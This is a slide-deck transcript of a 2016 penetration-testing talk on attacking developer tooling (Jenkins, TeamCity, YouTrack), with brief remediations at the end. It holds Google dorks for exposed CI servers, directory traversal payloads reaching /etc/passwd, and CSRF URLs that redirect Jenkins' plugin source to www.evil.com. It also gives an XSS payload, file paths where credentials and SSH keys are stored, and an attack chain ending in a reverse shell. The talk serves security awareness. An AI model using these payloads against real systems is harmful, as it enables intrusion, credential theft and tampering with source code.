Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Simple bugs to pwn the devs

Andrey Plastunov
June 13, 2016
0
49

Simple bugs to pwn the devs

Andrey Plastunov

June 13, 2016
Tweet

More Decks by Andrey Plastunov

See All by Andrey Plastunov
Misusing oop in mvc frameworks. How to conveniently develop broken apps
plastunov
0
22
S[c*]rum is all around or: How to stop Continuous integration
plastunov
0
17

Featured

See All Featured
Designing for Performance
lara
604
68k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
0
170
Scaling GitHub
holman
458
140k
What’s in a name? Adding method to the madness
productmarketing
PRO
21
3k
We Have a Design System, Now What?
morganepeng
48
7.1k
Infographics Made Easy
chrislema
239
18k
For a Future-Friendly Web
brad_frost
174
9.3k
Reflections from 52 weeks, 52 projects
jeffersonlam
346
20k
[RailsConf 2023] Rails as a piece of cake
palkan
48
4.7k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
327
21k
Being A Developer After 40
akosma
84
590k
Navigating Team Friction
lara
183
13k

Transcript

  1. None

  2. @plastunovaa @osakaaa About me Andrey Plastunov Pentester at [DSEC.RU]

  3. Agenda •Intro to Dev ecosystem •Why to attack? •Breaking in:

    Listing the targets •Breaking in: Attack scenarios •Useful Tools •Remediations (short)

  4. Developer ecosystem

  5. IDEs CI system VCS Issue treacker Deployments erver Developer ecosystem

  6. 1. Directly affects Source codes of your product 2. Works

    with developer's identity 3. Can provide a great help for attacker during network infiltration Why to attack?

  7. ➢ The source code itself Can be stolen Can be

    modified (infected) Why to attack?

  8. Goodies: Source code Real life example from some red team

    Why to attack? ➢ what do they have? 1 Target copmany 1 unawared software vendor

  9. Real life example from some red team ➢ What do

    they want? Get access to Target's network Why to attack?

  10. Real life example from some red team ➢ But... •

    Access the Developers VCS • Download the sources • Parse sources for hardoced values • Find passwords from admin’s endpoint • Acces the endpoint and upload a shell Why to attack?

  11. ➢ The source code itself Can be stolen Can be

    modified (infected) ➢ Your identity (== signing key) Signing malicious code with your keys ➢ Elevation of privilege Credentials (Domain, ssh, etc) Code execution (== backend access) Why to attack?

  12. Breaking in

  13. Breaking in Sources Identity Network creds Backend + + +

    - + + - - + + +++ + +- - + - Actually, not in scope =)

  14. IDEs CI system VCS Issue treacker Deployments erver Breaking in

  15. IDEs VCS Issue treacker Deployments erver Breaking in CI system

    Source code access Signing key access Access rights on all other components That is our target

  16. Goodies: Source code CI System A note on CI: basic

    scheme Plugins UI Master Slave

  17. Goodies: Source code • Jenkins • No authentication enabled by

    default • No roles at all - Unauth • Teamcity • Registration enabled by default (Often, with “Project developer” role) • Guest login enabled by default - Guest - Open reg A note on CI: Access level problems Google dork: intitle:“Dashboard [Jenkins]” intext:”Manage Jenkins” Google dork: intitle: “Projects - TeamCity” Google dork: intitle: “Register a New user Account - TeamCity”

  18. Goodies: Source code • Weak protection against CSRF attacks (truth

    for default or outdated instances) • A great number of vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems

  19. Goodies: Source code • Weak protection against CSRF attacks (truth

    for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems

  20. Goodies: Source code • Weak protection against CSRF attacks (truth

    for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems _

  21. Goodies: Source code • Weak protection against CSRF attacks (truth

    for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems _

  22. Goodies: Source code • Any project can access (and modify)

    files of other projects on the same Agent - Jenkins agent working dir - TeamCity agent working dir • If Agent == Master: Any project can access (and modify) CI configuration itself - Jenkins configuration dir - TeamCity configuration dir A note on CI: isolation problems ../workspace/ ../../work/ (buildAgent/work/) $JENKINS_HOME/ .BuildServer/config/

  23. Goodies: Source code Breaking in: CI (if we have access

    to it. And we almost certainly have!) Project administrator role Create Project Build Project Access to Build Server’s OS

  24. •Client side vulnerabilities Breaking in: CI (if we have access

    to it. And we almost certainly have!) Project administrator role

  25. •Client side vulnerabilities Breaking in: CI (if we have access

    to it. And we almost certainly have!) Project administrator role Setup XSS payload Plant XSS payload PWN! Examples can be found here*: https://goo.gl/YUqHbk Flaws in Jenkins: https://goo.gl/XJZcBk For flaws in TeamCity you can see the release notes: https://goo.gl/pEcjJm …Phish a little...

  26. • Build Agent’s Misuse (Agent == Master case) Breaking in:

    CI (if we have local network access. Teamcity case) Project administrator role

  27. Breaking in: CI (if we have local network access. Teamcity

    case) Function: <Censored until Security update> Payload example: #logs/../../../../../../../etc/passwd TeamCity Agent Directory Traversal in XML-RPC API

  28. • Build Agent’s Misuse (Agent == Master case) Hint1: Default

    Build Agent == Master Server Hint2: Master stores its super admin password in: Hint3: by default agent listens on 0.0.0.0 Hint4: Agent's default listening port is 9090 Breaking in: CI (if we have local network access. Teamcity case) Project administrator role Send a crafted XML-RPC payload to Agent* Perform MitM attack on agent and Master We gain super administrator role ./logs/teamcity-server.log

  29. • Build Agent’s Misuse (Agent == Master case) Hint1: Default

    Build Agent == Master Server Hint2: Master stores its super admin password in file ./logs/teamcity-server.log Hint3: by default agent listens on 0.0.0.0 Hint4: Agent's default listening port is 9090 Breaking in: CI (if we have local network access. Teamcity case) Project administrator role Send a crafted XML-RPC payload to Agent* Perform MitM attack on agent and Master We gain super administrator role

  30. Breaking in: CI Useful path for credential gathering Project administrator

    role •Jenkins • Build logs

  31. Useful path for credential gathering Breaking in: CI (if we

    have local network access. Teamcity case) Project administrator role •Jenkins • Build logs

  32. Useful path for credential gathering Project administrator role •Jenkins •

    Build logs • Passwords: ./jobs/<project_name>/config.xml • Project’s keystore: ./workspace/<project_name>/<keystore_name>/ (often but not always) •TeamCity • Internal HSQLDB: .BuildServer/system/buildserver.data • Project’s VCS config: .BuildServer/config/projects/<project name>/vcsRoots • Project’s ssh keys: .BuildServer/config/projects/<project name>/ssh_keys Breaking in: CI Useful path for credential gathering

  33. •Plugins misuse Breaking in: CI (if we have access to

    it. And we almost certainly have!) Project administrator role

  34. •Plugins misuse (Jenkins case) Breaking in: CI (if we have

    access to it. And we almost certainly have!) Project administrator role •Modify configuration VIA CSRF (or XSS) Setting up evil plugin server via CSRF vulnerability: /pluginManager/siteConfigure?site=http%3A%2F%2Fwww.evil.com&.crumb=&jso n=%7B%22site%22%3A+%22http%3A%2F%2Fwww.evil.com%22%2C+%22crumb% 22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0% BD%D0%B8%D1%82%D1%8C

  35. •Plugins misuse (Jenkins case) Breaking in: CI (if we have

    access to it. And we almost certainly have!) Project administrator role •Modify configuration VIA CSRF (or XSS) Setting up evil host as proxy for plugin server via CSRF vulnerability : /pluginManager/proxyConfigure?_.name=192.168.1.26&_.port=54321&_.userName=&_.passwo rd=&_.noProxyHost=&_.testUrl=http%3A%2F%2Fwww.ya.ru&.crumb=&json=%7B%22name%22 %3A+%22192.168.1.26%22%2C+%22port%22%3A+%2254321%22%2C+%22userName%22%3A+ %22%22%2C+%22password%22%3A+%22%22%2C+%22noProxyHost%22%3A+%22%22%2C+%22 testUrl%22%3A+%22http%3A%2F%2Fwww.ya.ru%22%2C+%22crumb%22%3A+%22%22%7D&Su bmit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C

  36. •Plugins misuse (Jenkins Case) Breaking in: CI (if we have

    access to it. And we almost certainly have!) Project administrator role Setup Malicious plugin server Exploit Client-Side vulnerability PWN VIA UI + plugin description For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9) cvcvcv

  37. •Plugins misuse (Jenkins Case) Breaking in: CI (if we have

    access to it. And we almost certainly have!) Project administrator role Setup Malicious plugin server Exploit Client-Side vulnerability PWN VIA UI + plugin description For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9) cvcvcv PWN VIA Plugin itself cvcvcv

  38. Goodies: Source code Breaking in: issue tracking (if we do

    no have access to CI) Administrative privileges Access to credentials storage Extracting CI credentials Access to CI

  39. •Client side vulnerabilities Breaking in: issue tracking (if we do

    no have access to CI) Administrative privileges

  40. Breaking in: issue tracking (if we do no have access

    to CI) YouTrack stored XSS Function: Upload attachment to Issue Payload example: Content-type:application/xml <?xml version="1.0" encoding="UTF-8"?> <Query> <SearchTerm> <script xmlns="http://www.w3.org/1999/xhtml"> alert('Hello'); </script> </SearchTerm> </Query>

  41. •Server side vulnerabilities Breaking in: issue tracking (if we do

    no have access to CI) Access to credentials storage

  42. Breaking in: issue tracking (if we do no have access

    to CI) YouTrack Directory Traversal Prerequisite: Set backup dir to any value you want on target OS (Admin privs required) Function: admin/databaseBackup + backupFile Payload example: /backupFile/passwd

  43. Goodies: Source code Breaking in: issue tracking (if we do

    no have access to CI) Client side vulnerability (e.g. XSS) Based on Youtrack’s capabilities Administrative privileges Server side vulnerability (e.g. Directory Traversal) Tracker’s OS access CI credential access For Youtrack various configuration properties (including credentials) could be found at: ~/teamsysdata/youtrack/00000000000.xd
  44. None

  45. Breaking in: All together Short summary of the video: 1.

    Upload XSS with a payload to download youtrack credentials to our host 2. Exploit the XSS against administrator 3. Parse the file on our host and find teamcity record 4. Use the teamcity credentials to upload shell on teamcity - I created a small tool to perform the task. It will be available on my github 5. Get the reverse shell to your host ... 6. Profit

  46. Goodies: Source code • Exploiting TeamCity account Creation (if it

    is disabled at first look) https://beyondbinary.io/articles/teamcity-account-creation • Retrieving the ecryption key via admin script console in Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html • What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. https://goo.gl/K6CiIE • Serialization Must Die: Act 2: XStream https://goo.gl/9c68jD • My github (in a couple of weeks ^_^): https://github.com/osakaaa/CI_tools Useful tips and tools:

  47. Remediations. Summary ➢ Never rely on default settings ➢ Never

    bind to 0.0.0.0 ➢ Never rely on safety of 3rd party components like plugins ➢ Update your tools as soon as a new security advisory is published ➢ Perform additional validation on all user inputs (including sources) ➢ Try to isolate projects (Docker?)

  48. The END ???